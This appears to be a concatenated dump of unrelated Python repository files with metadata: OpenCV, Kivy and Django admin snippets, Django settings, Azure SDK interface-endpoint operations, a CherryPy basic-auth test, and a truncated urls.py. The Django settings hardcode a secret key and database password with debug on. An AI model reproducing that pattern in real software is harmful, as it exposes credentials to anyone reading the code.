img2 = cv2.warpAffine(img, trans, (width,height))
cv2.imshow('image',img2)
cv2.waitKey()
|
[
"noreply@github.com"
] |
masaya-ueda.noreply@github.com
|
ee121fbd882866a933ea6f75a1ec2f90006ff419
|
b2973ee8f444e3abb0b62351007ede511ef45442
|
/screen_8.py
|
a8fddf2cde6dfc82e22ddd9b2b4fa5d77ab0bf3e
|
[] |
no_license
|
098anu/E-commerce-Kivy-App
|
2d664808be0389d4e4fca1eb9de4f34a70b3b96c
|
f38b5c7492fb9194e1ea6058801949635faf97cf
|
refs/heads/master
| 2020-04-26T17:13:22.744325
| 2019-03-04T08:46:46
| 2019-03-04T08:46:46
| 173,706,216
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
import kivy
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager,Screen
class Screen8(Screen):
def chg_scr(self):
self.a = App.get_running_app()
self.a.root.current='screen_4'
|
[
"noreply@github.com"
] |
098anu.noreply@github.com
|
672214eecc6699295c10c3fce25663c3edf99bd8
|
0419ab96804792c2b10bd1f7a99cdba8484d18c3
|
/main/admin.py
|
10cabd00c1b2ade9a6b5d1219b1b036681205a51
|
[] |
no_license
|
bjorndonald/staff
|
84c71fe8a33f8391056872cac1600a2a18934580
|
116cd7b9b468924d984ded4a792c1da77f9336c7
|
refs/heads/master
| 2023-04-07T14:33:41.776989
| 2021-04-13T08:57:08
| 2021-04-13T08:57:08
| 342,188,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
from django.contrib import admin
from .models import *
from django.contrib.auth.models import User, Group
# if not Group.objects.filter(name="Hod"):
# hod = Group()
# hod.name = "HOD"
# hod.save()
# elif not Group.objects.filter(name="Staff"):
# staff = Group()
# staff.name = "Staff"
# staff.save()
# elif not Group.objects.filter(name="Receptionist"):
# receptionist = Group()
# receptionist.name = "Receptionist"
# receptionist.save()
# elif not Group.objects.filter(name="Admin"):
# admin = Group()
# admin.name = "Admin"
# admin.save()
# elif not Group.objects.filter(name="ChiefMedical"):
# chief = Group()
# chief.name = "ChiefMedical"
# chief.save()
# adminobj = User.objects.get(username="admin")
# if not adminobj.groups.all():
# admin_group = Group.objects.get(name='Admin')
# adminobj.groups.add(admin_group)
class StaffAdmin(admin.ModelAdmin):
list_display = ('staff_name','rank')
list_display_links =('staff_name',)
class State_Of_OriginAdmin(admin.ModelAdmin):
list_display = ('state_name',)
list_display_links =('state_name',)
class LGAAdmin(admin.ModelAdmin):
list_display = ('name',)
list_display_links =('name',)
class LocationAdmin(admin.ModelAdmin):
list_display = ('name',)
list_display_links =('name',)
class StepAdmin(admin.ModelAdmin):
list_display = ('step',)
list_display_links =('step',)
class Grade_LevelAdmin(admin.ModelAdmin):
list_display = ('grade_level_name',)
list_display_links =('grade_level_name',)
class RankAdmin(admin.ModelAdmin):
list_display = ('rank',)
list_display_links =('rank',)
class Geopolitical_ZoneAdmin(admin.ModelAdmin):
list_display = ('geopolitical_zone',)
list_display_links =('geopolitical_zone',)
# Register your models here.
admin.site.register(Staff,StaffAdmin)
admin.site.register(State_Of_Origin, State_Of_OriginAdmin)
admin.site.register(Step, StepAdmin)
admin.site.register(Grade_Level, Grade_LevelAdmin)
admin.site.register(Rank, RankAdmin)
admin.site.register(LGA, LGAAdmin)
admin.site.register(Location, LocationAdmin)
admin.site.register(Geopolitical_Zone, Geopolitical_ZoneAdmin)
|
[
"bjorndonaldb@yahoo.com"
] |
bjorndonaldb@yahoo.com
|
8bb48ad2868ae1c6e66f051695a91618adc63fe3
|
bcf04651f923182084934effc9ea0105b4a51dd1
|
/notes_app/notes_app/settings.py
|
29f7803fb00137c1d5d5ef641a288079b10b7feb
|
[] |
no_license
|
BilyanaRumenova/Python-Web-Basics
|
99b3e6e1dc8a8f766507b24730dee6ba9897602a
|
4439182a13dde3d0fb4d38eca4c5249515c25e77
|
refs/heads/main
| 2023-07-30T10:26:10.056985
| 2021-10-01T17:43:52
| 2021-10-01T17:43:52
| 384,038,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,663
|
py
|
"""
Django settings for notes_app project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from os.path import join
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-@_kg2g@^_up^k(ohil3ne1t(ks6x3&rd#u9f$v$@1vcuak-ayl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'notes_app.note_app',
'notes_app.profile_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'notes_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'notes_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'notes_app_db',
'USER': 'postgres',
'PASSWORD': 'mypassword',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"bil.konstantinova@gmail.com"
] |
bil.konstantinova@gmail.com
|
a6ac867022374a7d5749606fe3f71e08c439b829
|
564d6a4d305a8ac6a7e01c761831fb2081c02d0f
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/aio/operations/_interface_endpoints_operations.py
|
77566c1a64c8b6fb8a612e5b37a03493495d778a
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
paultaiton/azure-sdk-for-python
|
69af4d889bac8012b38f5b7e8108707be679b472
|
d435a1a25fd6097454b7fdfbbdefd53e05029160
|
refs/heads/master
| 2023-01-30T16:15:10.647335
| 2020-11-14T01:09:50
| 2020-11-14T01:09:50
| 283,343,691
| 0
| 0
|
MIT
| 2020-07-28T22:43:43
| 2020-07-28T22:43:43
| null |
UTF-8
|
Python
| false
| false
| 22,801
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations:
"""InterfaceEndpointsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def get(
self,
resource_group_name: str,
interface_endpoint_name: str,
expand: Optional[str] = None,
**kwargs
) -> "models.InterfaceEndpoint":
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "models.InterfaceEndpoint",
**kwargs
) -> "models.InterfaceEndpoint":
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "models.InterfaceEndpoint",
**kwargs
) -> AsyncLROPoller["models.InterfaceEndpoint"]:
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
|
[
"noreply@github.com"
] |
paultaiton.noreply@github.com
|
feaedb644bd6aafe5e8f22d83f249aa852909466
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/carbon/common/lib/cherrypy/test/test_auth_basic.py
|
bdf0d7e1d1c0cd2d6f050c93047528626ed88b7e
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\lib\cherrypy\test\test_auth_basic.py
import cherrypy
from cherrypy._cpcompat import md5, ntob
from cherrypy.lib import auth_basic
from cherrypy.test import helper
class BasicAuthTest(helper.CPWebCase):
def setup_server():
class Root:
def index(self):
return 'This is public.'
index.exposed = True
class BasicProtected:
def index(self):
return "Hello %s, you've been authorized." % cherrypy.request.login
index.exposed = True
class BasicProtected2:
def index(self):
return "Hello %s, you've been authorized." % cherrypy.request.login
index.exposed = True
userpassdict = {'xuser': 'xpassword'}
userhashdict = {'xuser': md5(ntob('xpassword')).hexdigest()}
def checkpasshash(realm, user, password):
p = userhashdict.get(user)
return p and p == md5(ntob(password)).hexdigest() or False
conf = {'/basic': {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'wonderland',
'tools.auth_basic.checkpassword': auth_basic.checkpassword_dict(userpassdict)},
'/basic2': {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'wonderland',
'tools.auth_basic.checkpassword': checkpasshash}}
root = Root()
root.basic = BasicProtected()
root.basic2 = BasicProtected2()
cherrypy.tree.mount(root, config=conf)
setup_server = staticmethod(setup_server)
def testPublic(self):
self.getPage('/')
self.assertStatus('200 OK')
self.assertHeader('Content-Type', 'text/html;charset=utf-8')
self.assertBody('This is public.')
def testBasic(self):
self.getPage('/basic/')
self.assertStatus(401)
self.assertHeader('WWW-Authenticate', 'Basic realm="wonderland"')
self.getPage('/basic/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3JX')])
self.assertStatus(401)
self.getPage('/basic/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3Jk')])
self.assertStatus('200 OK')
self.assertBody("Hello xuser, you've been authorized.")
def testBasic2(self):
self.getPage('/basic2/')
self.assertStatus(401)
self.assertHeader('WWW-Authenticate', 'Basic realm="wonderland"')
self.getPage('/basic2/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3JX')])
self.assertStatus(401)
self.getPage('/basic2/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3Jk')])
self.assertStatus('200 OK')
self.assertBody("Hello xuser, you've been authorized.")
|
[
"le02005@163.com"
] |
le02005@163.com
|
f6744796ed340e7e048f4d8220c81eef3d8372a7
|
abcbaa89dcfb2ca1dd611a7bdac0b3e2b128fa19
|
/btre_project/urls.py
|
70e4808b547064a9c216ca94385e6f650fa64078
|
[] |
no_license
|
gaylonalfano/DjangoBTRealEstate
|
95994fd24fcbc011ee587f050b65ff738f7e92f4
|
e98d31530de1b634aedca3682e8bdc46ea118811
|
refs/heads/master
| 2020-04-01T22:53:02.835080
| 2018-11-19T08:28:04
| 2018-11-19T08:28:04
| 153,731,449
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,802
|
py
|
"""btre_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
"""
* **PROCESS OVERVIEW**: For this example we’re going to add an about page to our blog app: blog > urls.py > urlpatterns: path(‘about/', views.about, name=‘blog-about’). **NOTE: This is a little different than the process overview above since the one above is add adding a route to the main project! For this example, we’re only adding a new route/path within the blog app. This is a key difference and aligns with the Django framework and adding multiple apps within the site (i.e., a blog app in this case). It wants to keep the blog-specific (app-specific) functionality to be separate from the project-level functionality. So, if a user requests a page that’s within the blog app, the project will redirect the request to the blog app urls.py to be further handled.
* If a user/visitor to our site goes to the blog/about page, the request will now reference/be sent over to our blog.urls
* When Django encounters include(), it chops off the included portion of the url (“blog/") and only sends the remaining string (“about/" in this case) to the included blog.urls module to get processed. Since “about/" is remaining, it just sends the string “about/" over to blog.urls.
* Once it’s passed over to blog.urls, Django then starts searching for a matching “about/” string. Essentially Django is asking, "Do I have a pattern in here that matches “about/”?" Turns out yes we do: urlpatterns: path(‘about/', views.about, name=‘blog-about’)
* Based on the urlpattern, the “about/” route will be handled by the function views.about (defined in blog views.py): def about(request): return HttpResponse(‘<h1>Blog About</h1>’).
* So then we can navigate to our views.py file and then find the home function. Now it/the request comes to this home function and executes (the home function takes request as an argument).
* In this example, the home function essentially runs/says, "Ok, so now we just want to return an HttpResponse with an <h1> that says "Blog Home"." That's the whole process basically.
* **IMPORTANT**: Why it’s good that the URL gets passed around like this: If we wanted to change the route to our blog application (or any app we build for that matter), then we can change the URL in one place and it applies to all of those routes! For example, say we are building a blog that’s in development and we want to do some live testing on our website but weren’t ready to make it fully live just yet. We could simply go to our project urls.py urlpatterns and change the path from ‘blog/‘ to ‘blog_dev/‘ - it’s that easy! With that one change, in order to go to my blog that I’m developing and testing on my site, I just have to enter …/blog_dev/ and all the links/urls within the blog application will still be accessible through this blog_dev/ route now! Didn’t have to change anything in our blog application. Only had to change the one project path in the urls.py urlpatterns!
"""
from django.contrib import admin
# Need to import include() from django.urls so you can link the path to the
# urls.py file inside the pages app:
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
# Project-level URL configuration: each app's own urls.py is mounted under a
# prefix via include(); uploaded media is served from MEDIA_ROOT.
urlpatterns = [
# if you want to go straight to home page then use ''
path('', include('pages.urls')),
path('listings/', include('listings.urls')),
path('accounts/', include('accounts.urls')),
path('contacts/', include('contacts.urls')),
path('admin/', admin.site.urls),
